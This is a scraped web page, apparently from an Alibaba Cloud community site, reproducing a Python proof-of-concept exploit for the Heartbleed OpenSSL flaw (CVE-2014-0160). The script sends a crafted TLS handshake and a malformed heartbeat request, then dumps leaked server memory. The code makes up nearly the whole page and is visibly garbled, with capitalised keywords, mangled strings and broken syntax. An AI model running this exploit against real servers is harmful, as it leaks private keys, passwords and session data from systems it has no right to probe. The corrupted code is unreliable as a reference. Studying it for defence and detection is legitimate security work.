Heartbleed vulnerability exploitation program

Source: Internet
Author: User
Tags 04x ord cve

#! /Usr/bin/python



# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])

# The author disclaims copyright to this source code.



Import sys

Import struct

Import socket

Import time

Import select

Import re

From optparse import OptionParser



Options = OptionParser (usage = '% prog server [options]', description = 'Test for SSL heartbeat vulnerability (CVE-2014-0160 )')

Options. add_option ('-p',' -- port', type = 'int', default = 443, help = 'tcp port to test (default: 443 )')



Def h2bin (x ):

Return x. replace ('',''). replace ('\ n', ''). decode ('Hex ')



Hello = h2bin ('''

16 03 02 00 dc 01 00 00 d8 03 02 53

43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf

Bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00

00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88

00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c

C0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09

C0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44

C0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c

C0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11

00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04

03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19

00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08

00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13

00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00

00 0f 00 01 01

''')



Hb = h2bin ('''

18 03 02 00 03

01 40 00

''')



Def hexdump (s ):

For B in xrange (0, len (s), 16 ):

Lin = [c for c in s [B: B + 16]

Hxdat = ''. join ('% 02x' % ord (c) for c in lin)

Pdat = ''. join (c if 32 <= ord (c) <= 126 else '.') for c in lin)

Print '% 04x: %-48 s % s' % (B, hxdat, pdat)

Print



Def recvall (s, length, timeout = 5 ):

Endtime = time. time () + timeout

Rdata =''

Remain = length

While remain> 0:

Rtime = endtime-time. time ()

If rtime <0:

Return None

R, w, e = select. select ([s], [], [], 5)

If s in r:

Data = s. recv (remain)

# EOF?

If not data:

Return None

Rdata + = data

Remain-= len (data)

Return rdata

        



Def recvmsg (s ):

Hdr = recvall (s, 5)

If hdr is None:

Print 'unexpected EOF processing ing record header-server closed connection'

Return None, None, None

Typ, ver, ln = struct. unpack ('> bhh', hdr)

Pay = recvall (s, ln, 10)

If pay is None:

Print 'unexpected EOF processing ing record payload-server closed connection'

Return None, None, None

Print '... received message: type = % d, ver = % 04x, length = % d' % (typ, ver, len (pay ))

Return typ, ver, pay



Def hit_hb (s ):

S. send (hb)

While True:

Typ, ver, pay = recvmsg (s)

If typ is None:

Print 'no heartbeat response encoded ed, server likely not vulnerable'

Return False



If typ = 24:

Print 'stored Ed heartbeat response :'

Hexdump (pay)

# Print pay

If len (pay)> 3:

Print 'Warning: server returned more data than it shoshould-server is vulnerable! '

Else:

Print 'server processed malformed heartbeat, but did not return any extra data .'

Return True



If typ = 21:

Print 'stored Ed alert :'

Hexdump (pay)

Print 'server returned error, likely not vulnerable'

Return False



Def main ():

Opts, args = options. parse_args ()

If len (args) <1:

Options. print_help ()

Return



S = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

Print 'ing ing ...'

Sys. stdout. flush ()

S. connect (args [0], opts. port ))

Print 'sending Client Hello ...'

Sys. stdout. flush ()

S. send (hello)

Print 'waiting for Server Hello ...'

Sys. stdout. flush ()

While True:

Typ, ver, pay = recvmsg (s)

If typ = None:

Print 'server closed connection without sending Server Hello .'

Return

# Look for server hello done message.

If typ = 22 and ord (pay [0]) = 0x0E:

Break



Print 'sending heartbeat request ...'

Sys. stdout. flush ()

S. send (hb)

Hit_hb (s)



If _ name _ = '_ main __':

Main ()

Heartbleed vulnerability exploitation program

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.